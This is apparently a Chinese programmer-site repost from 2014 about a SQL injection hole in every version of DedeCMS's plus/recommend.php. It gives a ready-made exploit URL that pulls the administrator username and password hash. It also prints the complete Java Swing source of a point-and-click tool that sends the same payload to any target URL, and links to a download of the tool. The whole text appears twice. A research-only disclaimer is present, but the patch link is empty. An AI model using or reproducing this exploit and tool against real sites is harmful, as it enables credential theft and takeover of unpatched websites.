DedeCMS全版本通杀SQL注入漏洞利用代码及工具2014年2月28日
程序员文章站
2022-07-10 10:08:39
近日,网友在dedecms中发现了全版本通杀的SQL注入漏洞,目前官方最新版已修复该漏洞,大家早点去官方下载补丁2014年2月28日... 14-02-28...
dedecms即织梦(php开源网站内容管理系统)。织梦内容管理系统(dedecms) 以简单、实用、开源而闻名,是国内最知名的php开源网站管理系统,也是使用用户最多的php类cms系统。
近日,网友在dedecms中发现了全版本通杀的sql注入漏洞,目前官方最新版已修复该漏洞,相关利用代码如下:
exp:
http://*.*.com/plus/recommend.php?action=&aid=1&_files[type][tmp_name]=\' or mid=@`\'` /*!50000union*//*!50000select*/1,2,3,(select concat(0x7c,userid,0x7c,pwd)+from+`%23@__admin` limit+0,1),5,6,7,8,9%23@`\'`+&_files[type][name]=1.jpg&_files[type][type]=application/octet-stream&_files[type][size]=111
直接获取就可以得到管理员的用户名与加密后的密码,效果如下图所示
利用工具源码(by 园长):
package org.javaweb.dede.ui;
import java.awt.toolkit;
import java.io.bufferedreader;
import java.io.inputstreamreader;
import java.net.url;
import java.util.regex.matcher;
import java.util.regex.pattern;
/**
*
* @author yz
*/
public class mainframe extends javax.swing.jframe {
private static final long serialversionuid = 1l;
/**
* creates new form mainframe
*/
public mainframe() {
initcomponents();
}
public string request(string url){
string str = "",tmp;
try {
bufferedreader br = new bufferedreader(new inputstreamreader(new url(url).openstream()));
while((tmp=br.readline())!=null){
str+=tmp+"\r\n";
}
} catch (exception e) {
jtextarea1.settext(e.tostring());
}
return str;
}
private void initcomponents() {
jpanel1 = new javax.swing.jpanel();
jlabel1 = new javax.swing.jlabel();
jtextfield1 = new javax.swing.jtextfield();
jbutton1 = new javax.swing.jbutton();
jscrollpane1 = new javax.swing.jscrollpane();
jtextarea1 = new javax.swing.jtextarea();
setdefaultcloseoperation(javax.swing.windowconstants.exit_on_close);
jlabel1.settext("url:");
jtextfield1.settext("<a href="http://localhost">http://localhost</a>");
this.settitle("dedecms recommend.php注入利用工具-p2j.cn");
int screenwidth = toolkit.getdefaulttoolkit().getscreensize().width;
int screenheight = toolkit.getdefaulttoolkit().getscreensize().height;
this.setbounds(screenwidth / 2 - 229, screenheight / 2 - 158, 458, 316);
jbutton1.settext("获取");
jbutton1.addactionlistener(new java.awt.event.actionlistener() {
public void actionperformed(java.awt.event.actionevent evt) {
jbutton1actionperformed(evt);
}
});
jtextarea1.setcolumns(20);
jtextarea1.setrows(5);
jscrollpane1.setviewportview(jtextarea1);
javax.swing.grouplayout jpanel1layout = new javax.swing.grouplayout(jpanel1);
jpanel1.setlayout(jpanel1layout);
jpanel1layout.sethorizontalgroup(
jpanel1layout.createparallelgroup(javax.swing.grouplayout.alignment.leading)
.addgroup(jpanel1layout.createsequentialgroup()
.addgroup(jpanel1layout.createparallelgroup(javax.swing.grouplayout.alignment.trailing, false)
.addcomponent(jscrollpane1, javax.swing.grouplayout.alignment.leading)
.addgroup(javax.swing.grouplayout.alignment.leading, jpanel1layout.createsequentialgroup()
.addcontainergap()
.addcomponent(jlabel1)
.addpreferredgap(javax.swing.layoutstyle.componentplacement.related)
.addcomponent(jtextfield1, javax.swing.grouplayout.preferred_size, 331, javax.swing.grouplayout.preferred_size)
.addpreferredgap(javax.swing.layoutstyle.componentplacement.related)
.addcomponent(jbutton1, javax.swing.grouplayout.preferred_size, 83, javax.swing.grouplayout.preferred_size)))
.addgap(0, 0, short.max_value))
);
jpanel1layout.setverticalgroup(
jpanel1layout.createparallelgroup(javax.swing.grouplayout.alignment.leading)
.addgroup(jpanel1layout.createsequentialgroup()
.addcontainergap()
.addgroup(jpanel1layout.createparallelgroup(javax.swing.grouplayout.alignment.baseline)
.addcomponent(jlabel1)
.addcomponent(jtextfield1,
javax.swing.grouplayout.preferred_size,
javax.swing.grouplayout.default_size,
javax.swing.grouplayout.preferred_size)
.addcomponent(jbutton1))
.addpreferredgap(javax.swing.layoutstyle.componentplacement.related)
.addcomponent(jscrollpane1, javax.swing.grouplayout.default_size, 254, short.max_value))
);
javax.swing.grouplayout layout = new javax.swing.grouplayout(getcontentpane());
getcontentpane().setlayout(layout);
layout.sethorizontalgroup(
layout.createparallelgroup(javax.swing.grouplayout.alignment.leading)
.addcomponent(jpanel1, javax.swing.grouplayout.default_size, javax.swing.grouplayout.default_size, short.max_value)
);
layout.setverticalgroup(
layout.createparallelgroup(javax.swing.grouplayout.alignment.leading)
.addcomponent(jpanel1, javax.swing.grouplayout.default_size, javax.swing.grouplayout.default_size, short.max_value)
);
pack();
}// </editor-fold>
private void jbutton1actionperformed(java.awt.event.actionevent evt) {
string url = jtextfield1.gettext();
if(null==url||"".equals(url)){
return ;
}
string result = request(url+"/plus/recommend.php?action=&aid=1&_files[type][tmp_name]=\\%27%20or%20mid=@`\\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20concat(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\\%27`+&_files[type][name]=1.jpg&_files[type][type]=application/octet-stream&_files[type][size]=4294");
matcher m = pattern.compile("<h2>(.*)</h2>").matcher(result);
if(m.find()){
string[] s = m.group(1).split("\\|");
if(s.length>2){
jtextarea1.settext("username:"+s[1]+"\r\nmd5:"+s[2].substring(3,s[2].length()-1));
}
}
}
public static void main(string args[]) {
java.awt.eventqueue.invokelater(new runnable() {
public void run() {
new mainframe().setvisible(true);
}
});
}
// variables declaration - do not modify
private javax.swing.jbutton jbutton1;
private javax.swing.jlabel jlabel1;
private javax.swing.jpanel jpanel1;
private javax.swing.jscrollpane jscrollpane1;
private javax.swing.jtextarea jtextarea1;
private javax.swing.jtextfield jtextfield1;
// end of variables declaration
}
利用工具下载地址 http://pan.baidu.com/s/1i37lunf (本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!)
dedecms官方补丁地址:
近日,网友在dedecms中发现了全版本通杀的sql注入漏洞,目前官方最新版已修复该漏洞,相关利用代码如下:
exp:
复制代码
代码如下:http://*.*.com/plus/recommend.php?action=&aid=1&_files[type][tmp_name]=\' or mid=@`\'` /*!50000union*//*!50000select*/1,2,3,(select concat(0x7c,userid,0x7c,pwd)+from+`%23@__admin` limit+0,1),5,6,7,8,9%23@`\'`+&_files[type][name]=1.jpg&_files[type][type]=application/octet-stream&_files[type][size]=111
直接获取就可以得到管理员的用户名与加密后的密码,效果如下图所示
利用工具源码(by 园长):
复制代码
代码如下:package org.javaweb.dede.ui;
import java.awt.toolkit;
import java.io.bufferedreader;
import java.io.inputstreamreader;
import java.net.url;
import java.util.regex.matcher;
import java.util.regex.pattern;
/**
*
* @author yz
*/
public class mainframe extends javax.swing.jframe {
private static final long serialversionuid = 1l;
/**
* creates new form mainframe
*/
public mainframe() {
initcomponents();
}
public string request(string url){
string str = "",tmp;
try {
bufferedreader br = new bufferedreader(new inputstreamreader(new url(url).openstream()));
while((tmp=br.readline())!=null){
str+=tmp+"\r\n";
}
} catch (exception e) {
jtextarea1.settext(e.tostring());
}
return str;
}
private void initcomponents() {
jpanel1 = new javax.swing.jpanel();
jlabel1 = new javax.swing.jlabel();
jtextfield1 = new javax.swing.jtextfield();
jbutton1 = new javax.swing.jbutton();
jscrollpane1 = new javax.swing.jscrollpane();
jtextarea1 = new javax.swing.jtextarea();
setdefaultcloseoperation(javax.swing.windowconstants.exit_on_close);
jlabel1.settext("url:");
jtextfield1.settext("<a href="http://localhost">http://localhost</a>");
this.settitle("dedecms recommend.php注入利用工具-p2j.cn");
int screenwidth = toolkit.getdefaulttoolkit().getscreensize().width;
int screenheight = toolkit.getdefaulttoolkit().getscreensize().height;
this.setbounds(screenwidth / 2 - 229, screenheight / 2 - 158, 458, 316);
jbutton1.settext("获取");
jbutton1.addactionlistener(new java.awt.event.actionlistener() {
public void actionperformed(java.awt.event.actionevent evt) {
jbutton1actionperformed(evt);
}
});
jtextarea1.setcolumns(20);
jtextarea1.setrows(5);
jscrollpane1.setviewportview(jtextarea1);
javax.swing.grouplayout jpanel1layout = new javax.swing.grouplayout(jpanel1);
jpanel1.setlayout(jpanel1layout);
jpanel1layout.sethorizontalgroup(
jpanel1layout.createparallelgroup(javax.swing.grouplayout.alignment.leading)
.addgroup(jpanel1layout.createsequentialgroup()
.addgroup(jpanel1layout.createparallelgroup(javax.swing.grouplayout.alignment.trailing, false)
.addcomponent(jscrollpane1, javax.swing.grouplayout.alignment.leading)
.addgroup(javax.swing.grouplayout.alignment.leading, jpanel1layout.createsequentialgroup()
.addcontainergap()
.addcomponent(jlabel1)
.addpreferredgap(javax.swing.layoutstyle.componentplacement.related)
.addcomponent(jtextfield1, javax.swing.grouplayout.preferred_size, 331, javax.swing.grouplayout.preferred_size)
.addpreferredgap(javax.swing.layoutstyle.componentplacement.related)
.addcomponent(jbutton1, javax.swing.grouplayout.preferred_size, 83, javax.swing.grouplayout.preferred_size)))
.addgap(0, 0, short.max_value))
);
jpanel1layout.setverticalgroup(
jpanel1layout.createparallelgroup(javax.swing.grouplayout.alignment.leading)
.addgroup(jpanel1layout.createsequentialgroup()
.addcontainergap()
.addgroup(jpanel1layout.createparallelgroup(javax.swing.grouplayout.alignment.baseline)
.addcomponent(jlabel1)
.addcomponent(jtextfield1,
javax.swing.grouplayout.preferred_size,
javax.swing.grouplayout.default_size,
javax.swing.grouplayout.preferred_size)
.addcomponent(jbutton1))
.addpreferredgap(javax.swing.layoutstyle.componentplacement.related)
.addcomponent(jscrollpane1, javax.swing.grouplayout.default_size, 254, short.max_value))
);
javax.swing.grouplayout layout = new javax.swing.grouplayout(getcontentpane());
getcontentpane().setlayout(layout);
layout.sethorizontalgroup(
layout.createparallelgroup(javax.swing.grouplayout.alignment.leading)
.addcomponent(jpanel1, javax.swing.grouplayout.default_size, javax.swing.grouplayout.default_size, short.max_value)
);
layout.setverticalgroup(
layout.createparallelgroup(javax.swing.grouplayout.alignment.leading)
.addcomponent(jpanel1, javax.swing.grouplayout.default_size, javax.swing.grouplayout.default_size, short.max_value)
);
pack();
}// </editor-fold>
private void jbutton1actionperformed(java.awt.event.actionevent evt) {
string url = jtextfield1.gettext();
if(null==url||"".equals(url)){
return ;
}
string result = request(url+"/plus/recommend.php?action=&aid=1&_files[type][tmp_name]=\\%27%20or%20mid=@`\\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20concat(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\\%27`+&_files[type][name]=1.jpg&_files[type][type]=application/octet-stream&_files[type][size]=4294");
matcher m = pattern.compile("<h2>(.*)</h2>").matcher(result);
if(m.find()){
string[] s = m.group(1).split("\\|");
if(s.length>2){
jtextarea1.settext("username:"+s[1]+"\r\nmd5:"+s[2].substring(3,s[2].length()-1));
}
}
}
public static void main(string args[]) {
java.awt.eventqueue.invokelater(new runnable() {
public void run() {
new mainframe().setvisible(true);
}
});
}
// variables declaration - do not modify
private javax.swing.jbutton jbutton1;
private javax.swing.jlabel jlabel1;
private javax.swing.jpanel jpanel1;
private javax.swing.jscrollpane jscrollpane1;
private javax.swing.jtextarea jtextarea1;
private javax.swing.jtextfield jtextfield1;
// end of variables declaration
}
利用工具下载地址 http://pan.baidu.com/s/1i37lunf (本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!)
dedecms官方补丁地址:
下一篇: 诊断你的网站处在排名哪个阶段的方法详解